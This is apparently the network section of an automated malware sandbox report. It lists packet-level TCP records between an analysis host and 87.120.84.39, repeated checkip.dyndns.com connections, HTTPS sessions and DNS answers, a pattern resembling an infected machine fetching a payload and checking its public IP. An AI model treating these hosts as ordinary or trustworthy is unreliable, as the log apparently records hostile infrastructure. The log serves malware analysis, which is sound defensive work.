                                                                                                                                  Nov 19, 2024 18:08:04.888509989 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888586998 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888597965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888607979 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888617992 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888628006 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888628006 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888638020 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888653040 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888668060 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978791952 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978846073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978846073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978852987 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978866100 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978876114 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978887081 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979099035 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979099035 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979192972 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979223967 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979268074 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979290962 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979301929 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979325056 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979338884 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979346037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979346037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979357004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979358912 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979368925 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979376078 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979382038 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979391098 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979392052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979402065 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979403973 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979413986 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979445934 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979603052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979649067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979649067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979660034 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979671955 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979686022 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979705095 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979705095 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979760885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979770899 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979782104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979792118 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979801893 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979804039 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979809046 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979819059 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979826927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979834080 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979837894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979850054 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979863882 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979872942 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979891062 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997663021 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997682095 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997694969 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997708082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997720957 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997747898 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997797966 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997811079 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997821093 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997936964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997936964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997936964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998028994 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998039961 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998075962 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998177052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998188972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998228073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998265028 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998277903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998289108 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998300076 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998311996 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998313904 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998323917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998331070 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998334885 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998343945 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998357058 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998358011 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998370886 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998380899 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998390913 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998467922 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998480082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998492002 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998501062 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998512983 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998526096 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998536110 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998677969 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998691082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998703003 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998713970 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998728991 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998749971 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998749971 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998774052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998785973 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998799086 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998817921 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998836040 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998836040 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998910904 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998923063 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998934984 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998946905 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998960972 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998980045 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998980045 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999066114 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999078035 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999089956 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999099016 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999109983 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999111891 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999124050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999126911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999145985 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999160051 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999237061 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999255896 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999268055 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999279976 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999281883 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999291897 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999303102 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999303102 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999306917 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999320984 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999325991 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999332905 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999339104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999346018 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999351025 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999363899 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999373913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.999376059 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.999376059 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089318037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089327097 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089329004 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089340925 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089350939 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089353085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089360952 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089374065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089390039 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089570999 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089584112 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089596987 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089622021 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089639902 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089699984 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089713097 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089724064 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089735031 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089745998 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089746952 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089756966 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089760065 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:05.089776993 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.089787960 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:05.325048923 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:10.244579077 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:10.249604940 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.249680996 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:10.250392914 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:10.255156994 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.728616953 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.761604071 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:10.767266989 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.865844965 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.921286106 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:10.921364069 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:10.921423912 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:10.933190107 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:10.933232069 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.081865072 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.081950903 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:11.407815933 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.407905102 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:11.417819023 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:11.417854071 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.418948889 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.500066996 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:11.543407917 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.972656012 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.972738028 CET44349163188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:11.972796917 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:11.975084066 CET49163443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:12.015062094 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:12.020168066 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.118700027 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.132610083 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:12.132708073 CET44349164188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.132776022 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:12.133169889 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:12.133203030 CET44349164188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.337897062 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.338005066 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:12.594834089 CET44349164188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.651014090 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:12.651051044 CET44349164188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.766516924 CET44349164188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.766572952 CET44349164188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:12.766630888 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:12.774578094 CET49164443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:13.622941017 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.628433943 CET8049162193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:13.628513098 CET4916280192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.662142992 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.667002916 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:13.667052984 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.667134047 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:13.672261953 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.160260916 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.160502911 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:14.167557955 CET8049165193.122.130.0192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.167648077 CET4916580192.168.2.22193.122.130.0
                                                                                                                                  Nov 19, 2024 18:08:14.183079004 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.183113098 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.183182001 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.183593035 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.183608055 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.653073072 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.658344030 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.658422947 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.809524059 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.809593916 CET44349166188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.809739113 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.810239077 CET49166443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:14.868482113 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:14.873400927 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:14.873955011 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:14.873955011 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:14.878861904 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.450604916 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.481357098 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.481451035 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.481534958 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.481847048 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.481878042 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.651798964 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:15.961772919 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:15.975033045 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:15.975073099 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.109462023 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.109534025 CET44349168188.114.97.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.109596014 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:16.110797882 CET49168443192.168.2.22188.114.97.3
                                                                                                                                  Nov 19, 2024 18:08:16.126342058 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:16.131500006 CET8049167158.101.44.242192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.131755114 CET4916780192.168.2.22158.101.44.242
                                                                                                                                  Nov 19, 2024 18:08:16.152602911 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:16.157496929 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:16.157572031 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:16.157659054 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:16.162415028 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.776053905 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.806382895 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:17.806412935 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.806570053 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:17.829405069 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:17.829421043 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:17.976305008 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:18.304811954 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.309379101 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:18.309406042 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.460526943 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.460613012 CET44349170188.114.96.3192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.460648060 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:18.465471983 CET49170443192.168.2.22188.114.96.3
                                                                                                                                  Nov 19, 2024 18:08:18.613153934 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:18.780680895 CET8049169132.226.8.169192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.780744076 CET4916980192.168.2.22132.226.8.169
                                                                                                                                  Nov 19, 2024 18:08:18.811197996 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  Nov 19, 2024 18:08:18.816095114 CET8049171132.226.247.73192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:18.816247940 CET4917180192.168.2.22132.226.247.73
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.318320036 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Nov 19, 2024 18:08:21.324929953 CET8.8.8.8192.168.2.220x483bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
